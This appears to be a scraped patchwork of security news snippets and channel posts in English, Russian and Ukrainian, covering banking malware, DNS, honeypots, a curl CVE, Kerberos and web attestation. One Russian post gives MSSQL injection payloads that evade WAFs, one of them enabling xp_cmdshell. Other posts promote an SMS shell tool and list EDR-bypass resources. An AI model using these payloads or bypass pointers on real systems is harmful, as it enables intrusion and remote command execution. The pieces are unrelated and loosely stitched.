https://www.theregister.com/2023/12/20/credentialstealing_malware_infects_50k_banking/
When the requested banking page "contains a certain keyword and a login button with a specific ID present, new malicious content is injected," Langus explained. "Credential theft is executed by adding event listeners to this button, with an option to steal a one-time password (OTP) token with it."
The script is fairly smart: it communicates with a remote command-and-control (C2) server, and removes itself from the DOM tree – deletes itself from the login page, basically – once it's done its thing, which makes it tricky to detect and analyze.
The malware can perform a series of nefarious actions, and these are based on an "mlink" flag the C2 sends. In total, there are nine different actions that the malware can perform depending on the "mlink" value, we're told.
These include injecting a prompt for the user's phone number or two-factor authentication token, which the miscreants can use with the intercepted username and password to access the victim's bank account and steal their cash.
What's Normal: New uses of DNS, Discovery of Designated Resolvers (DDR)
Local recursive resolvers are usually configured via DHCP. Your ISP, or the network you connect to, will usually advertise one or two IP addresses to use as your resolver. As far as I know, DHCP cannot configure an encrypted resolver. But earlier today, @HQuest on X pointed out that iOS 17 implemented a new protocol, "Discovery of Designated Resolvers (DDR)". [1]
The idea is that a resolver you have already configured via traditional means like DHCP may advertise that it is also reachable via DoH/Q/T. Cloudflare stated that they implemented experimental support for DDR in March of 2022, but my tests today did not get the expected response [2].
What's Normal? DNS TTL Values
I am trying to start a series of brief diaries about "what's normal." Analysts often only look at the network when they suspect something is wrong. But to find the anomaly, someone must first know what's normal. So, I am trying to collect data from my home network to show what to consider. The values I am presenting here are normal for my home network and will likely differ for your network. So, instead of just copying/pasting, run the experiment yourself :)
https://blog.securitybreached.org/2023/08/18/bug-bounty-blueprint-a-beginners-guide/
Подробное руководство по Bug Bounty в 2023 году. Где, что и как нужно искать, чтобы получить максимальный профит.
Много ссылок на кейсы из жизни, ресерчи известных баг хантеров, лабы и репозитории с полезными утилитами.
в продолжение прошлого поста
https://news.ycombinator.com/item?id=36954351
"RA-TLS (Remote Attestation TLS) architecture is defined in the white paper Integrating Remote Attestation with Transport Layer Security, to enable Intel® Software Guard Extensions (Intel® SGX) remote attestation during the establishment of a standard Transport Layer Security (TLS) connection. In a TLS server / client scenario, the TLS server runs inside an SGX enclave. It generates a public-private keypair, creates an SGX report with a hash of the public key in its user-data field, and gets an SGX quote for this report. It then creates an X.509 certificate with a custom extension containing this SGX quote. This customized certificate is sent to a TLS client in the TLS handshake protocol. The client gets the SGX quote from the certificate and performs remote attestation to verify that the connected server runs inside an authentic Intel® SGX enclave."
В MSSQL есть незадокументированная фича, которая может помочь при пентесте.
";" - символ, который мы привыкли использовать для разделения нескольких запросов в SQL-синтаксисе (если речь не идет о subquery).
И какой-нибудь PostgreSQL или MySQL запнется о конструкции, вроде
SELECT 'A' SELECT 'B' SELECT 'C'и поругается, что мы нарушили синтаксис, не указав нужный терминатор. Так как он ожидает, что мы разделим эти запросы точкой с запятой.
SELECT * FROM test WHERE id = 1 WAITFOR DELAY '0:0:5'
use[tempdb]create/**/table[test]([id]int)insert[test]values(1)select[id]from[test]drop/**/table[test].или еще один пример с изменением конфигурации, чтобы можно было выполнять xp_cmdshell.
admin'exec('sp_configure''show advanced option'',''1''reconfigure')exec('sp_configure''xp_cmdshell'',''1''reconfigure')--Это полезно тем, что некоторые WAF могут увидеть такие строки, посчитать их безопасными и пропустить запросы. Например, AWS WAF, в который и был сдан такой баг. Читать полностью…
Отлично! Теперь шелл можно и через SMS пропихнуть.
Пока безопасники бьются с DLP, настраивают политики и заливают порты эпоксидкой, просто отправь SMS на номер.TCPoverSMS, my ass.
https://github.com/persistent-security/SMShell
https://www.bleepingcomputer.com/news/technology/registrars-can-now-block-all-domains-that-resemble-brand-names/
Платная защита бренда от фишинговых доменов 😁 (результат не гарантирован)
What did I say to make you stop talking to me?
[...] Attackers are interested in attempting to detect honeypots; over the years, we have seen various ways to do so. But so far, we have not done much to prevent this. We randomize some fo the parameters, but overall, we just run a "stock" cowrie install. There is however a relatively easy method to find out what gave the honeypot away after the attacker connected.
Most attackers will immediately disconnect after they realize they have found a honeypot. So as a simple method, you just find out what the last command was an attacker executed. I just did this for some of our larger honeypots, investigating about 10 million cowrie sessions. [...]
Decoupling for Security
In the last few years, a slew of ideas old and new have converged to reveal a path out of this morass, but they haven’t been widely recognized, combined, or used. These ideas, which we’ll refer to in the aggregate as “decoupling,” allow us to rethink both security and privacy.
Here's the gist. The less someone knows, the less they can put you and your data at risk. In security this is called Least Privilege. The decoupling principle applies that idea to cloud services by making sure systems know as little as possible while doing their jobs. It states that we gain security and privacy by separating private data that today is unnecessarily concentrated.
Malware Dropped Through a ZPAQ Archive
[...]
The file was called "Purchase Order pdf.zpaq" (SHA256:1c33eef0d22dc54bb2a41af485070612cd4579529e31b63be2141c4be9183eb6). The fact that the archive is using an "exotic" compress algorithm, the VT score is null! I tried the classic tools on a stock Windows operating systems, including 7Zip and no one was able to decompress the archive. This is a strange because it reduces the number of potential victims! On Windows, you can use PeaZip.
CVE-2023-38545: curl SOCKS5 oversized hostname vulnerability. How bad is it?
The vulnerability is a heap-based buffer overflow, which may lead to arbitrary code execution. Modern operating systems should make exploitation of heap-based buffer overflows more difficult, but exploitation is possible.
To exploit this vulnerability, the attacker has to be able to supply an oversized hostname to curl. Host names passed to curl should be validated, and I do not believe such an oversized hostname would pass input validation. Sure, an attacker can run "curl" on the command line, but if they can do so, they already have code execution capabilities. A valid exploit would require an attacker to trigger code execution by, for example, passing a hostname to a web app that would trigger the code execution in curl.
Next, the exploit only exists if curl is used to connect to a SOCKS5 proxy. This is another dependency, making exploitation less likely.
Kerberos Protocol Tutorial
The Kerberos protocol is designed to provide reliable authentication over open and insecure networks where communications between the hosts belonging to it may be intercepted. However, one should be aware that Kerberos does not provide any guarantees if the computers being used are vulnerable: the authentication servers, application servers (imap, pop, smtp, telnet, ftp, ssh , AFS, lpr, ...) and clients must be kept constantly updated so that the authenticity of the requesting users and service providers can be guaranteed.
The above points justify the sentence: "Kerberos is an authentication protocol for trusted hosts on untrusted networks". By way of example, and to reiterate the concept: Kerberos' strategies are useless if someone who obtains privileged access to a server, can copy the file containing the secret key. Indeed, the intruder will put this key on another machine, and will only have to obtain a simple spoof DNS or IP address for that server to appear to clients as the authentic server.
https://github.blog/2023-08-17-mtls-when-certificate-authentication-is-done-wrong/
Читать полностью…This is scary. It's (strong) SafetyNet for websites.
Every now and then I run into another Android app I can no longer run because someone decided my phone, running an official build of my choice of OS, that isn't even rooted, is "not trustable".
Now they want to start doing that for websites.
This kills open Linux on the desktop (including Asahi Linux). It kills alternative browsers. It is a backdoor to kill ad blockers.
No. Just no. Please.
https://github.com/RupertBenWiser/Web-Environment-Integrity/blob/main/explainer.md
astrr/110759096656649459">source from lina">Asahi Lina (朝日リナ)
https://www.hackerfactor.com/blog/index.php?/archives/995-No-NOC-Networking-Part-1.html
[...] I run a bunch of web sites, but I don't have a room full of IT experts. I don't have a network operations center (NOC), security operations center (SOC), or even a full-time system administrator.What I have is me. And I only pay attention to the computers when I'm in the office.
[...] I know my servers are constantly being scanned and attacked. But rather than relying on humans monitoring the network for potential attacks, I've created some automated defenses that permit me to manage the servers with almost no overhead. [...]
https://www.securesystems.de/blog/building-a-red-team-infrastructure-in-2023/
#red_team #pentest #infra
Підбірка матеріалів по обходу EDR
https://blog.nviso.eu/2021/10/21/kernel-karnage-part-1/
https://windows-internals.com/thread-and-process-state-change/
https://nasbench.medium.com/symantec-edr-internals-event-enrichment-rules-part-i-b5e4340041a7
https://github.com/asaurusrex/Probatorum-EDR-Userland-Hook-Checker
https://github.com/CCob/SharpBlock/
https://s3cur3th1ssh1t.github.io/A-tale-of-EDR-bypass-methods/
https://github.com/jthuraisamy/SysWhispers2
https://www.crummie5.club/freshycalls/
https://outflank.nl/blog/2020/12/26/direct-syscalls-in-beacon-object-files/
https://github.com/jthuraisamy/TelemetrySourcerer/blob/master/TelemetrySourcerer/UmETW.cpp
https://blog.nviso.eu/2021/10/21/kernel-karnage-part-1/
https://windows-internals.com/thread-and-process-state-change/
https://nasbench.medium.com/symantec-edr-internals-event-enrichment-rules-part-i-b5e4340041a7
https://github.com/asaurusrex/Probatorum-EDR-Userland-Hook-Checker